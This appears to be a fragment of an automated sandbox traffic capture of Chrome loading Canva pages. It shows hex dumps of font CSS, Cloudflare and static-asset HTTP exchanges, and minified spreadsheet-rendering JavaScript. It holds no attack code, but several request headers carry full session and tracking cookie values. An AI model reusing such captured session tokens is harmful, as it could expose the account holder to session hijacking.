                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 2d 32 62 31 61 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 37 45 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 37 45 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f
                                                                                                                                                                                                                                                    Data Ascii: -2b1a; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: italic; src: url(https://font-public.canva.com/_fb/0/7E.woff2) format("woff2"), url(https://font-public.canva.com/_fb/0/7E.woff) format("woff"), url(https://font-public.canva.co
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 30 2d 39 66 64 30 2c 55 2b 61 39 36 30 2d 61 39 37 63 2c 55 2b 61 63 30 30 2d 66 61 36 64 2c 55 2b 66 65 31 30 2d 66 65 31 39 2c 55 2b 66 65 33 30 2d 66 65 36 62 2c 55 2b 66 66 30 31 2d 66 66 65 65 2c 55 2b 31 66 31 30 30 2d 32 66 39 66 34 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 31 36 2e 77 6f 66 66 32 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 32 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69
                                                                                                                                                                                                                                                    Data Ascii: 0-9fd0,U+a960-a97c,U+ac00-fa6d,U+fe10-fe19,U+fe30-fe6b,U+ff01-ffee,U+1f100-2f9f4; font-family: "_fb_"; font-display: swap; font-weight: 700; font-style: normal; src: url(https://font-public.canva.com/_fb/0/16.woff2) format("woff2"), url(https://font-publi
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 31 36 2d 71 75 61 64 72 61 74 69 63 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 31 36 2e 6f 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 64 38 32 2d 64 66 34 2c 55 2b 31 31 31 65 31 2d 31 31 31 66 34 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72
                                                                                                                                                                                                                                                    Data Ascii: va.com/_fb/0/16-quadratic.woff) format("woff"), url(https://font-public.canva.com/_fb/0/16.otf) format("truetype")}@font-face {unicode-range: U+d82-df4,U+111e1-111f4; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: normal; src: ur
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1369INData Raw: 30 2f 36 30 2e 77 6f 66 66 29 20 66 6f 72 6d 61 74 28 22 77 6f 66 66 22 29 2c 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 2d 70 75 62 6c 69 63 2e 63 61 6e 76 61 2e 63 6f 6d 2f 5f 66 62 2f 30 2f 36 30 2e 74 74 66 29 20 66 6f 72 6d 61 74 28 22 74 72 75 65 74 79 70 65 22 29 7d 0d 0a 40 66 6f 6e 74 2d 66 61 63 65 20 7b 75 6e 69 63 6f 64 65 2d 72 61 6e 67 65 3a 20 55 2b 39 30 30 2d 39 37 66 2c 55 2b 31 63 64 30 2d 31 63 66 39 2c 55 2b 61 38 33 30 2d 61 38 66 64 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 5f 66 62 5f 22 3b 20 66 6f 6e 74 2d 64 69 73 70 6c 61 79 3a 20 73 77 61 70 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 20 73 72 63 3a 20 75 72 6c 28 68 74 74 70 73 3a 2f 2f 66
                                                                                                                                                                                                                                                    Data Ascii: 0/60.woff) format("woff"), url(https://font-public.canva.com/_fb/0/60.ttf) format("truetype")}@font-face {unicode-range: U+900-97f,U+1cd0-1cf9,U+a830-a8fd; font-family: "_fb_"; font-display: swap; font-weight: 400; font-style: normal; src: url(https://f


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    27192.168.2.449741104.16.103.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC1479OUTGET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: CDI=04b60d8a-0afb-4ec1-9086-045d7e0ec7dd; CPA=cnvanTz1hOxPVUJgop6_IlmuWwa-NtyfWx2O1ceJGGLF020n1ZV1iKl7wwDbWBY1Z5UjC1zWarjFNtvOsTB9ze88FeebuPUzY_v79VpdqxDEtzLk9WJhLeSQQjH7JN6qNs-Wtc6o7zrq2JaxSKJ8fHuCDlyVjZdk-rMvs92E0iCq3Z4e_Ddaw8ql5C7MfUKyYgGsGiVJjn3AbdJRGWNuAOZuRWS1q9P0RyLvZo6y3BpPPawIZcZBR6IG9jF176jVnVHy8rFl75lXO4qS_AEGcl534B5JhWxjJqIBv8qqSSKzICruOChEyLtZQbqiZYNoH_EsNTC2n3egVJXzYG-VSbcKWyiEOPkya2G12OS0p-zdBS6xGrr1f720lFYes8MQuJrJu7esh07zUdQtvmvxWQR1vWUuxrmnxfZZMFEwzJPOQXZL6A7VX3oRNQCb1Kzf0dJnvmOj6qoLIrdZzZXvRU96Dlzm6I9fzkJh0nMUj609KEEKP28z8jIw5ITGlSaSLeAalv51mKABcq9K8DNq1VX_wz7_VcUr_Sjqabe-VYjoRVD1Z4JInkjYHE6xUUNellFfFr9r3Bw15690698; CCK=a_O3O23kihyJVif7Fk2gFQ; __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; ASI=01JFGD2YV02D5APP1T8YZ7689M
                                                                                                                                                                                                                                                    2024-12-19 21:27:28 UTC778INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:28 GMT
                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    location: /cdn-cgi/challenge-platform/h/b/scripts/jsd/787bc399e22f/main.js?
                                                                                                                                                                                                                                                    cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=10800, public
                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DQyZXVgyH4c%2FZ%2FERzjn4F%2F%2FOg9y1t1aamRz2mzkN6zG2VUQ6SLUYBiCpMXt9Tx283VBinWAve28sqbZhwQ6qDWHSPaoCY7teh9iDmL4GUUYtfzRyf%2FLjuZde9VNsJps%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                    CF-RAY: 8f4a7a13bbad7c6f-EWR


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    28192.168.2.449771104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC787OUTGET /web/18db09b659c42845.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:29 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 44810
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a188bd98cbd-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71058
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "99252e478b7202700b285066ee7024cc"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:15 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:32 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: MqGoa9gJq9pyNkmQYp57DYMcvnKh3L/zaj2oYfOqppm29g0n/6V1NbXqQ9a+2bc9uabuqNq5xs8=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYNK9W2SJEZH9B1
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: p1TgceUJi23ENT9DImHjiwqr_AS8lRmR
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC352INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 43 6a 45 44 79 6b 57 70 6d 4b 78 75 52 65 65 76 4c 4c 75 51 25 32 42 35 6a 71 4b 50 79 65 51 6f 32 6e 51 31 58 64 37 66 68 44 59 79 5a 6d 77 39 42 63 4b 68 79 45 33 34 48 46 61 36 31 67 57 37 38 45 41 6a 77 31 54 6a 48 63 35 76 25 32 42 7a 58 74 35 53 33 48 4d 4a 63 72 37 45 39 67 42 57 64 74 44 38 25 32 42 49 46 71 75 49 66 31 4c 5a 42 56 50 48 5a 45 52 52 4d 25 32 42 4c 39 30 6f 46 48 31 53 66 63 42 64 39 77 63 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CjEDykWpmKxuReevLLuQ%2B5jqKPyeQo2nQ1Xd7fhDYyZmw9BcKhyE34HFa61gW78EAjw1TjHc5v%2BzXt5S3HMJcr7E9gBWdtD8%2BIFquIf1LZBVPHZERRM%2BL90oFH1SfcBd9wc%3D"}],"group":"cf-nel","max_age":6048
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1196INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 34 32 35 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 33 38 34 30 36 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 73 65 6c 66 2e 5f 66 65
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[1425],{/***/ 38406:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 61 2e 63 6f 6e 74 65 78 74 3b 5f 5f 63 2e 78 28 22 66 6f 72 6d 75 6c 61 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 62 3d 64 2e 54 65 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 74 79 70 65 29 29 3b 62 3d 64 2e 54 65 2e 76 61 6c 75 65 3b 73 77 69 74 63 68 28 62 2e 74 79 70 65 29 7b 63 61 73 65 20 22 69 6e 76 61 6c 69 64 22 3a 62 3d 62 2e 6d 58 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 63 61 6e 6f 6e 69 63 61 6c 22 3a 62 3d 62 2e 4c 43 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 42 28 62 29 3b 7d 5f 5f 63 2e 78 28 62 2e 73 74 61 72 74 73 57 69 74 68 28 22 3d 22 29 29 3b 63 6f 6e 73 74 20 65 3d 64 2e 51 70 3b 62 3d 7b 74 79 70
                                                                                                                                                                                                                                                    Data Ascii: a.context;__c.x("formula"===(null===d||void 0===d?void 0:null===(b=d.Te)||void 0===b?void 0:b.type));b=d.Te.value;switch(b.type){case "invalid":b=b.mX;break;case "canonical":b=b.LC;break;default:throw new B(b);}__c.x(b.startsWith("="));const e=d.Qp;b={typ
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 3a 7b 77 69 64 74 68 3a 62 2c 68 65 69 67 68 74 3a 63 2c 74 72 61 6e 73 66 6f 72 6d 3a 60 73 63 61 6c 65 28 24 7b 64 7d 29 60 7d 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 62 78 37 34 75 51 22 2c 63 68 69 6c 64 72 65 6e 3a 6a 37 28 5f 5f 63 2e 73 76 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6c 37 28 7b 79 69 6d 6c 31 67 3a 65 2c 6f 59 6c 68 58 41 3a 66 7d 29 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 61 6c 69 67 6e 6d 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 61 7d 29 7d 29 7d 2c 6b 42 62 3d 66 75 6e 63 74 69 6f 6e 28 7b 77 69 3a 61 2c 68 69 67 68 6c 69 67 68 74 3a 62 2c 73 63 61 6c 65 3a 63 2c 6a 6f 3a 64 2c 77 6b 3a 65 2c 70 72 61 3a 66 7d 29 7b 63 6f 6e 73 74 20 67 3d 6d 37 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6d 3d 6e 75 6c 6c 3d 3d 3d 64 7c
                                                                                                                                                                                                                                                    Data Ascii: :{width:b,height:c,transform:`scale(${d})`},className:"bx74uQ",children:j7(__c.sv,{className:l7({yiml1g:e,oYlhXA:f}),size:"small",alignment:"center",children:a})})},kBb=function({wi:a,highlight:b,scale:c,jo:d,wk:e,pra:f}){const g=m7(()=>{const m=null===d|
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 6c 3d 6f 37 28 6e 3d 3e 6e 75 6c 6c 21 3d 66 2e 73 65 6c 65 63 74 69 6f 6e 26 26 61 2e 6c 6f 61 28 66 2e 73 65 6c 65 63 74 69 6f 6e 29 2e 68 61 73 28 6e 29 2c 5b 66 2e 73 65 6c 65 63 74 69 6f 6e 5d 29 2c 6d 3d 6f 37 28 6e 3d 3e 6e 75 6c 6c 21 3d 66 2e 73 65 6c 65 63 74 69 6f 6e 26 26 61 2e 71 43 61 28 66 2e 73 68 65 65 74 2c 66 2e 73 65 6c 65 63 74 69 6f 6e 29 2e 68 61 73 28 6e 29 2c 0a 5b 66 2e 73 68 65 65 74 2c 66 2e 73 65 6c 65 63 74 69 6f 6e 5d 29 3b 72 65 74 75 72 6e 20 6a 37 28 71 37 2c 7b 2e 2e 2e 66 2c 73 63 61 6c 65 3a 67 2c 77 6b 3a 6b 2c 53 6f 61 3a 6d 2c 74 6a 61 3a 6c 2c 77 78 3a 62 7d 29 7d 29 3b 72 65 74 75 72 6e 7b 4f 72 61 3a 63 2c 4e 72 61 3a 64 2c 50 72 61 3a 65 7d 7d 2c 6e 42 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20
                                                                                                                                                                                                                                                    Data Ascii: l=o7(n=>null!=f.selection&&a.loa(f.selection).has(n),[f.selection]),m=o7(n=>null!=f.selection&&a.qCa(f.sheet,f.selection).has(n),[f.sheet,f.selection]);return j7(q7,{...f,scale:g,wk:k,Soa:m,tja:l,wx:b})});return{Ora:c,Nra:d,Pra:e}},nBb=function(a){const
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 28 75 42 62 2c 7b 2e 2e 2e 74 68 69 73 2e 70 72 6f 70 73 2c 73 63 61 6c 65 46 61 63 74 6f 72 3a 74 68 69 73 2e 73 63 61 6c 65 46 61 63 74 6f 72 2c 4a 6e 3a 62 2c 6e 43 3a 74 68 69 73 2e 6e 43 2c 70 67 3a 74 68 69 73 2e 70 67 2c 4a 6f 61 3a 64 2c 65 76 3a 66 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 2e 2e 2e 6b 29 7b 73 75 70 65 72 28 2e 2e 2e 6b 29 3b 74 68 69 73 2e 73 63 61 6c 65 46 61 63 74 6f 72 3d 74 37 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6c 3d 74 68 69 73 2e 70 72 6f 70 73 2e 69 74 65 6d 3b 76 61 72 20 6d 3d 74 68 69 73 2e 70 72 6f 70 73 2e 69 62 2c 6e 3d 6d 2e 4e 7a 3b 6d 3d 6d 2e 7a 6f 6f 6d 3b 73 77 69 74 63 68 28 6e 29 7b 63 61 73 65 20 22 73 63 72 65 65 6e 22 3a 72 65 74 75 72 6e 20 31 3b 63 61 73 65 20 22 70 72 69 6e 74 22 3a 6e 3d 64 2e 45
                                                                                                                                                                                                                                                    Data Ascii: (uBb,{...this.props,scaleFactor:this.scaleFactor,Jn:b,nC:this.nC,pg:this.pg,Joa:d,ev:f})}constructor(...k){super(...k);this.scaleFactor=t7(()=>{const l=this.props.item;var m=this.props.ib,n=m.Nz;m=m.zoom;switch(n){case "screen":return 1;case "print":n=d.E
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 2a 7a 2c 75 29 2c 2e 2e 2e 5f 5f 63 2e 78 4a 28 28 74 2d 71 29 2a 7a 2c 6e 2a 79 2c 44 29 7d 7d 7d 29 2e 66 69 6c 74 65 72 28 5f 5f 63 2e 6f 62 29 3b 72 65 74 75 72 6e 5b 2e 2e 2e 66 2e 6d 61 70 28 6e 3d 3e 7b 76 61 72 20 70 2c 71 2c 72 3d 6e 2e 42 65 61 2c 74 3d 6e 2e 59 4b 61 2c 75 3d 6e 2e 4c 33 3b 63 6f 6e 73 74 20 77 3d 6e 2e 63 6f 6c 6f 72 2c 79 3d 6e 2e 77 65 69 67 68 74 3b 6e 3d 6e 2e 7a 62 3b 63 6f 6e 73 74 20 7a 3d 6e 75 6c 6c 3d 3d 3d 28 70 3d 68 2e 67 65 74 28 75 37 28 72 2c 74 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 70 3f 76 6f 69 64 20 30 3a 70 2e 44 61 3b 70 3d 6e 75 6c 6c 3d 3d 3d 28 71 3d 68 2e 67 65 74 28 75 37 28 72 2c 75 29 29 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 71 3f 76 6f 69 64 20 30 3a 71 2e 6f 61 3b 69 66 28 6e 75 6c 6c 21 3d 7a
                                                                                                                                                                                                                                                    Data Ascii: *z,u),...__c.xJ((t-q)*z,n*y,D)}}}).filter(__c.ob);return[...f.map(n=>{var p,q,r=n.Bea,t=n.YKa,u=n.L3;const w=n.color,y=n.weight;n=n.zb;const z=null===(p=h.get(u7(r,t)))||void 0===p?void 0:p.Da;p=null===(q=h.get(u7(r,u)))||void 0===q?void 0:q.oa;if(null!=z
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 6c 20 6f 66 20 64 29 7b 63 3d 6b 2e 62 61 3b 76 61 72 20 66 3d 6c 2e 63 6f 6c 75 6d 6e 2c 67 3d 61 2e 6c 61 79 6f 75 74 2e 63 65 6c 6c 73 2e 67 65 74 28 63 2c 66 29 3b 69 66 28 21 67 7c 7c 28 22 73 74 61 72 74 22 3d 3d 3d 6b 2e 62 6f 75 6e 64 61 72 79 3f 67 2e 73 70 61 6e 2e 4d 62 3d 3d 3d 0a 63 3a 67 2e 73 70 61 6e 2e 42 63 3d 3d 3d 63 29 29 69 66 28 63 3d 62 2e 67 65 74 28 60 24 7b 66 2e 69 64 7d 3a 24 7b 63 2e 69 64 7d 60 29 2c 63 3d 22 73 74 61 72 74 22 3d 3d 3d 6b 2e 62 6f 75 6e 64 61 72 79 3f 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 2e 6f 61 3a 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 3f 76 6f 69 64 20 30 3a 63 2e 44 61 29 7b 67 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3b 66 3d 28 66
                                                                                                                                                                                                                                                    Data Ascii: l of d){c=k.ba;var f=l.column,g=a.layout.cells.get(c,f);if(!g||("start"===k.boundary?g.span.Mb===c:g.span.Bc===c))if(c=b.get(`${f.id}:${c.id}`),c="start"===k.boundary?null===c||void 0===c?void 0:c.oa:null===c||void 0===c?void 0:c.Da){g=e[e.length-1];f=(f
                                                                                                                                                                                                                                                    2024-12-19 21:27:29 UTC1369INData Raw: 61 2e 49 6f 61 2e 4b 77 61 28 63 2c 62 2e 6c 61 79 6f 75 74 2e 72 6f 77 73 2e 6c 61 73 74 28 29 2c 62 2e 6c 61 79 6f 75 74 2e 63 6f 6c 73 2e 6c 61 73 74 28 29 29 3b 61 3d 28 71 2c 72 29 3d 3e 7b 63 6f 6e 73 74 20 74 3d 66 2e 67 65 74 28 71 29 7c 7c 30 2c 75 3d 66 2e 67 65 74 28 72 29 7c 7c 30 3b 72 65 74 75 72 6e 20 74 3c 3d 75 3f 71 3a 72 7d 3b 63 6f 6e 73 74 20 67 3d 6e 65 77 20 4d 61 70 3b 69 66 28 30 3d 3d 3d 64 2e 6c 65 6e 67 74 68 7c 7c 30 3d 3d 3d 65 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 20 67 3b 76 61 72 20 68 3d 5b 5d 2c 6b 3d 62 2e 6c 61 79 6f 75 74 2e 63 6f 6c 73 2e 50 65 28 65 5b 30 5d 2e 63 6f 6c 75 6d 6e 29 3b 6b 26 26 68 2e 70 75 73 68 28 7b 63 6f 6c 75 6d 6e 3a 6b 2c 62 6f 75 6e 64 61 72 79 3a 22 73 74 61 72 74 22 7d 29 3b 0a 68 2e 70
                                                                                                                                                                                                                                                    Data Ascii: a.Ioa.Kwa(c,b.layout.rows.last(),b.layout.cols.last());a=(q,r)=>{const t=f.get(q)||0,u=f.get(r)||0;return t<=u?q:r};const g=new Map;if(0===d.length||0===e.length)return g;var h=[],k=b.layout.cols.Pe(e[0].column);k&&h.push({column:k,boundary:"start"});h.p
